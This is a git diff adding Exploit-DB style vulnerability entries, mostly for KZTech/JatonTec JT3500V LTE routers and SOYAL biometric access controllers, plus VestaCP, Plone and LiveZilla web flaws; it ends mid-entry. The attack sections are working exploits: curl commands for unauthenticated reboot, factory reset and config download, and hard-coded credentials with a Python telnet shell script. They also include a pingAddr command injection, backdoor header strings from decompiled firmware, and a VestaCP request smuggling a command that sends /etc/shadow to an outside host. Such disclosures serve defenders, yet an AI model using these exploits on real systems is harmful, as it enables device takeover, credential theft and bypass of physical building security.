diff --git a/exploits/hardware/dos/49685.txt b/exploits/hardware/dos/49685.txt
new file mode 100644
index 000000000..289b28d56
--- /dev/null
+++ b/exploits/hardware/dos/49685.txt
@@ -0,0 +1,68 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The device allows unauthenticated attackers to restart the
+device with an HTTP GET request to /goform/RestartDevice page.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5643
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php
+
+
+03.02.2021
+
+--
+
+
+$ curl -sk https://192.168.1.1/goform/RestartDevice
+success
+$
\ No newline at end of file
diff --git a/exploits/hardware/remote/49682.txt b/exploits/hardware/remote/49682.txt
new file mode 100644
index 000000000..fbd46f841
--- /dev/null
+++ b/exploits/hardware/remote/49682.txt
@@ -0,0 +1,92 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The device utilizes hard-coded credentials within its Linux
+distribution image. These sets of credentials are never exposed to
+the end-user and cannot be changed through any normal operation of
+the router.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5637
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php
+
+
+03.02.2021
+
+--
+
+
+Default web creds:
+------------------
+admin:admin123
+user:user123
+
+Telnet/SSH access:
+------------------
+admin:root123
+
+===
+
+import telnetlib
+
+host="192.168.1.1"
+user="admin"
+password="root123"
+s=telnetlib.Telnet(host)
+s.read_until(b"CPE login: ")
+s.write(user.encode('ascii') + b"\n")
+s.read_until(b"Password: ")
+s.write(password.encode('ascii') + b"\n")
+s.write(b"busybox\n")
+print(s.read_all().decode('ascii'))
+s.mt_interact()
+s.close()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49676.txt b/exploits/hardware/webapps/49676.txt
new file mode 100644
index 000000000..046a39548
--- /dev/null
+++ b/exploits/hardware/webapps/49676.txt
@@ -0,0 +1,53 @@
+# Exploit Title: SOYAL Biometric Access Control System 5.0 - Master Code Disclosure
+# Date: 25.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
+
+Vendor: SOYAL Technology Co., Ltd
+Product web page: https://www.soyal.com.tw | https://www.soyal.com
+Affected version: AR-727 i/CM - F/W: 5.0
+ AR837E/EF - F/W: 4.3
+ AR725Ev2 - F/W: 4.3 191231
+ AR331/725E - F/W: 4.2
+ AR837E/EF - F/W: 4.1
+ AR-727CM /i - F/W: 4.09
+ AR-727CM /i - F/W: 4.06
+ AR-837E - F/W: 3.03
+
+Summary: Soyal Access systems are built into Raytel Door Entry Systems
+and are providing access and lift control to many buildings from public
+and private apartment blocks to prestigious public buildings.
+
+Desc: The controller suffers from a cleartext transmission of sensitive
+information. This allows interception of the HTTP traffic and disclose
+the Master code and the Arming code via a man-in-the-middle attack. An
+attacker can obtain these codes to enter into the controller's Programming
+mode and bypass physical security controls in place.
+
+Tested on: SOYAL Technology WebServer 2.0
+ SOYAL Serial Device Server 4.03A
+ SOYAL Serial Device Server 4.01n
+ SOYAL Serial Device Server 3.07n
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5630
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php
+
+
+25.01.2021
+
+--
+
+
+$ curl 'http://192.168.1.1/CtrlParam.htm' \
+ -H 'Authorization: Basic YWRtaW46' | \
+ grep -ni -B1 'masterCode\|armCode'
+
+| Master Code (6 Digital) |
+ |
+ Arming Code (4 Digital) |
+ |
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49677.html b/exploits/hardware/webapps/49677.html
new file mode 100644
index 000000000..1e54b1d2f
--- /dev/null
+++ b/exploits/hardware/webapps/49677.html
@@ -0,0 +1,65 @@
+# Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF
+# Date: 25.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
+
+Vendor: SOYAL Technology Co., Ltd
+Product web page: https://www.soyal.com.tw | https://www.soyal.com
+Affected version: AR-727 i/CM - F/W: 5.0
+ AR837E/EF - F/W: 4.3
+ AR725Ev2 - F/W: 4.3 191231
+ AR331/725E - F/W: 4.2
+ AR837E/EF - F/W: 4.1
+ AR-727CM /i - F/W: 4.09
+ AR-727CM /i - F/W: 4.06
+ AR-837E - F/W: 3.03
+
+Summary: Soyal Access systems are built into Raytel Door Entry Systems
+and are providing access and lift control to many buildings from public
+and private apartment blocks to prestigious public buildings.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: SOYAL Technology WebServer 2.0
+ SOYAL Serial Device Server 4.03A
+ SOYAL Serial Device Server 4.01n
+ SOYAL Serial Device Server 3.07n
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5632
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php
+
+
+25.01.2021
+
+--
+
+
+
+
+
+
+
+
+...
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49680.txt b/exploits/hardware/webapps/49680.txt
new file mode 100644
index 000000000..701429924
--- /dev/null
+++ b/exploits/hardware/webapps/49680.txt
@@ -0,0 +1,83 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The application suffers from an authenticated OS command
+injection vulnerability. This can be exploited to inject and
+execute arbitrary shell commands through the 'pingAddr' HTTP
+POST parameter bypassing the injection protection filter.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5635
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
+
+
+03.02.2021
+
+--
+
+
+#JT3300V/AM3300V
+lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
+ --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
+ -H "Cookie: kz_userid=admin:311139" \
+ -H "X-Requested-With: XMLHttpRequest"
+ping: bad address 'Linux'
+lqwrm@metalgear:~/prive$
+
+
+#JT3500V
+lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
+ --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
+ -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
+ -H "X-Requested-With: XMLHttpRequest"
+ping: bad address 'Linux'
+lqwrm@metalgear:~/prive$
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49681.txt b/exploits/hardware/webapps/49681.txt
new file mode 100644
index 000000000..25cbf7485
--- /dev/null
+++ b/exploits/hardware/webapps/49681.txt
@@ -0,0 +1,89 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The application suffers from an authentication bypass
+vulnerability. An unauthenticated attacker can disclose sensitive
+and clear-text information resulting in authentication bypass by
+downloading the configuration of the device and revealing the
+admin password.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5636
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php
+
+
+03.02.2021
+
+--
+
+
+$ curl -s \
+ -o configtest.zlib \ # Default: config.dat
+ 'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
+ binwalk -e configtest.zlib ; \
+ cd _configtest.zlib_extracted ; \
+ strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \
+ # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
+ cd ..
+
+3:Login=admin
+4:Password=neotelwings
+5:TelnetPwd=root123
+6:GuestId=user
+7:GuestPassword=user123
+89:DDNSPassword=
+239:auto_update_password=
+279:Tr069_Password=
+288:Tr069_ConnectionRequestPassword=admin
+300:Tr069_STUNPassword=
+339:telnetManagement=2
+$
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49683.txt b/exploits/hardware/webapps/49683.txt
new file mode 100644
index 000000000..a2e29abb8
--- /dev/null
+++ b/exploits/hardware/webapps/49683.txt
@@ -0,0 +1,124 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The device has several backdoors and hidden pages that
+allow remote code execution, overwriting of the bootrom and
+enabling debug mode.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5639
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php
+
+
+03.02.2021
+
+--
+
+
+Older and newer models defer in backdoor code.
+By navigating to /syscmd.html or /syscmd.asp pages
+an attacker can authenticate and execute system
+commands with highest privileges.
+
+Old models (syscmd.asp) password: super1234
+
+Newer models (syscmd.html) password: md5(WAN_MAC+version):
+
+$ curl -k https://192.168.1.1/goform/getImgVersionInfo
+{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}
+
+...
+pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
+ if (*pcVar6 == 0) {
+ pcVar6 = "6C:AD:EF:00:00:01";
+ }
+ memset(acStack280,0,0x100);
+ sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
+ ...
+ psMd5Init(auStack112);
+ psMd5Update(auStack112,local_10,local_c);
+ psMd5Final(auStack112,uParm1);
+ return;
+...
+
+
+Another 2 backdoors exist using the websCheckCookie() and specific header strings.
+
+...
+ iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
+ if (iVar2 != 0) {
+ return 0xffffffff;
+ }
+ if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
+ (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
+ return 0xffffffff;
+ ...
+ if (iVar1 != 0) goto LAB_0047c304;
+LAB_0047c32c:
+ WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
+LAB_0047c35c:
+ __n = strlen(__s1);
+ if (__n == 0) {
+ snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
+ WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
+ system(acStack1560);
+ websWrite(iParm1,"invalid command!");
+ goto LAB_0047c3f8;
+ }
+...
+
+
+Bypass the backdoor password request and enable debug mode from within the web console:
+
+$('#div_check').modal('hide'); <--- syscmd.html
+
+g_password_check_alert.close(); <--- syscmd.asp
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49684.txt b/exploits/hardware/webapps/49684.txt
new file mode 100644
index 000000000..b615d64e3
--- /dev/null
+++ b/exploits/hardware/webapps/49684.txt
@@ -0,0 +1,72 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: The device allows unauthenticated attackers to visit the
+unprotected /goform/LoadDefaultSettings endpoint and reset the
+device to its factory default settings. Once the GET request is
+made, the device will reboot with its default settings allowing
+the attacker to bypass authentication and take full control of
+the system.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5642
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php
+
+
+03.02.2021
+
+--
+
+
+$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings
+success
+$
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49686.txt b/exploits/hardware/webapps/49686.txt
new file mode 100644
index 000000000..043197b21
--- /dev/null
+++ b/exploits/hardware/webapps/49686.txt
@@ -0,0 +1,70 @@
+# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
+# Date: 03.02.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
+
+Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
+Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
+ http://www.jatontec.com/products/show.php?itemid=258
+ http://www.jatontech.com/CAT12.html#_pp=105_564
+ http://www.kzbtech.com/AM3300V.html
+ https://neotel.mk/ostanati-paketi-2/
+
+Affected version: Model | Firmware
+ -------|---------
+ JT3500V | 2.0.1B1064
+ JT3300V | 2.0.1B1047
+ AM6200M | 2.0.0B3210
+ AM6000N | 2.0.0B3042
+ AM5000W | 2.0.0B3037
+ AM4200M | 2.0.0B2996
+ AM4100V | 2.0.0B2988
+ AM3500MW | 2.0.0B1092
+ AM3410V | 2.0.0B1085
+ AM3300V | 2.0.0B1060
+ AM3100E | 2.0.0B981
+ AM3100V | 2.0.0B946
+ AM3000M | 2.0.0B21
+ KZ7621U | 2.0.0B14
+ KZ3220M | 2.0.0B04
+ KZ3120R | 2.0.0B01
+
+Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
+& VoIP CPE product specially designed to enable quick and easy
+LTE fixed data service deployment for residential and SOHO customers.
+It provides high speed LAN, Wi-Fi and VoIP integrated services
+to end users who need both bandwidth and multi-media data service
+in residential homes or enterprises. The device has 2 Gigabit LAN
+ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
+CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
+and firewall software for security. It provides an effective
+all-in-one solution to SOHO or residential customers. It can
+deliver up to 1Gbps max data throughput which can be very
+competitive to wired broadband access service.
+
+Desc: JT3500V is vulnerable to unauthenticated configuration disclosure
+when direct object reference is made to the export_settings.cgi file
+using an HTTP GET request. This will enable the attacker to disclose
+sensitive information and help her in authentication bypass, privilege
+escalation and full system access.
+
+Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
+ Linux 2.6.36+ (mips)
+ Mediatek APSoC SDK v4.3.1.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5644
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php
+
+
+03.02.2021
+
+--
+
+
+$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
+8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49668.txt b/exploits/multiple/webapps/49668.txt
new file mode 100644
index 000000000..c8a33719f
--- /dev/null
+++ b/exploits/multiple/webapps/49668.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Plone CMS 5.2.3 - 'Title' Stored XSS
+# Date: 18-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://plone.com/
+# Software Link: https://github.com/plone/Products.CMFPlone/tags
+# Version: 5.2.3
+# Tested on: Windows 10
+
+
+# Reference - https://github.com/plone/Products.CMFPlone/issues/3255
+
+Steps to reproduce the issue:
+1- Goto https://localhost/ where Plone 5.2.3 version is installed.
+2- Click on "Log in now" and Login as "Manager"
+3- Navigate to Manager=>Site Setup=>Site
+4- Edit "Site title" field to "xyz"
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49674.txt b/exploits/multiple/webapps/49674.txt
new file mode 100644
index 000000000..b12709b9f
--- /dev/null
+++ b/exploits/multiple/webapps/49674.txt
@@ -0,0 +1,26 @@
+# Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
+# Date: 17.03.2021
+# Author: Numan Türle
+# Vendor Homepage: https://vestacp.com
+# Software Link: https://myvestacp.com < 0.9.8-26-43
+# Software Link: https://vestacp.com < 0.9.8-26
+
+
+POST /edit/server/ HTTP/1.1
+Host: TARGET:8083
+Connection: close
+Content-Length: 6633
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+User-Agent: USER_AGENT
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
+Cookie: PHPSESSID=HERE_COOKIE
+sec-gpc: 1
+
+token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save
+
+
+
+Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow
\ No newline at end of file
diff --git a/exploits/php/webapps/49669.txt b/exploits/php/webapps/49669.txt
new file mode 100644
index 000000000..a6b0bb580
--- /dev/null
+++ b/exploits/php/webapps/49669.txt
@@ -0,0 +1,19 @@
+# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
+# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
+# Date: 18 Mars 2021
+# Exploit Author: Clément Cruchet
+# Vendor Homepage: https://www.livezilla.net
+# Software Link: https://www.livezilla.net/downloads/en/
+# Version: LiveZilla Server 8.0.1.0 and before
+# Tested on: Windows/Linux
+# CVE : CVE-2019-12962
+
+GET /mobile/index.php HTTP/1.1
+Host: chat.website.com
